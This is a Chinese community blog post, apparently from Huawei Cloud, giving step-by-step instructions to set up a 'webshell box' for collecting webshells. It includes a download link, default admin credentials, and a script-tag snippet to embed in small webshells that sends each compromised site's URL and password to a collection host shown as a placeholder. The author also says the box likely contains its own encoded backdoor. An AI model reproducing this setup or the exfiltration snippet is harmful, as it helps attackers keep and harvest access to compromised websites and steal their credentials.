【webshell箱子】webshell箱子 搭建过程,使用方法,附带所需的下载链接
【摘要】 【webshell箱子】webshell箱子 搭建过程,使用方法,附带所需的下载链接
【webshell箱子】webshell箱子 搭建过程,使用方法,附带所需的下载链接
目录
错误一:
错误二:
错误三:
警示:
webshell搭建
错误过程:
错误一:
下载后直接将asp服务器(Sws)直接放在webshell_box文件里面
错误二:
使用与asp服务器环境不相匹配的系统安装
错误三:
错误打开方式,即使用打开其他网站一样的方式输入地址打开
正确搭建过程:
第一步:软件下载
链接:https://pan.baidu.com/s/1wlnQVd6wd0oEXvKjD7SnRw?pwd=hj12
提取码:hj12(内含webshellbox和asp服务器Sws)
Sws我测试的时候不支持win11(准确的说,是Sws支持win10以及以前的版本,毕竟已经老东西了)
如果不行就换小旋风等其他asp服务器试试
但是像我们这样的,应该会有虚拟机,我用我的win7搭建又搭建了一遍
(下一个phpstudy就可以了)
(我是没放后门的,自证清白,人在做天在看,举头三尺有神明)
第二步:放在网站目录下
这个网站目录即phpstudy的www下
第三步:将asp服务器放在网站目录下
(这个要根据所下载的asp的服务器的使用方法确定)
Sws是这样用的,如果下其他的服务器,请参考一下说明
把这个复制粘贴到目录下
第四步:打开webshell_box
在目录下,双击Sws2.3就可以直接在浏览器中打开了
然后先加载出来一个登录页面
账号:admin
密码:admin
警示:
点开系统设置的时候,有乱码,应该是被编码过
据我推测解码后会有后门
(我先声明不是我干的)
使用方法:
一般就是在小马里面制作后门,也就是调用了webshell箱子的api
(要认真学一下木马)
<script src=""http://xxx/api.aspurl="&server.URLEncode("""http://"&request.ServerVariables("HTTP_HOST")&request.ServerVariables("url"))&"&pass="&UserPass&"""></script>
(在网盘里面有)
下面2个实现获取当前网站的ip地址
&_SERVER["PHP_SELE"];正在执行的脚本文件名
$_SERVER["HTTP_HOST"];获取当前请求的host头部内容,即网站地址
然后将小马到处……
然后会返回URL、密码、后门服务器
一般打开开发者模式,点击网络,查看有没有传向其他地址的数据包,查看有没有后门
【声明】本内容来自华为云开发者社区博主,不代表华为云及华为云开发者社区的观点和立场。转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息,否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱:
cloudbbs@huaweicloud.com
- 点赞
- 收藏
- 关注作者
作者其他文章
评论(0)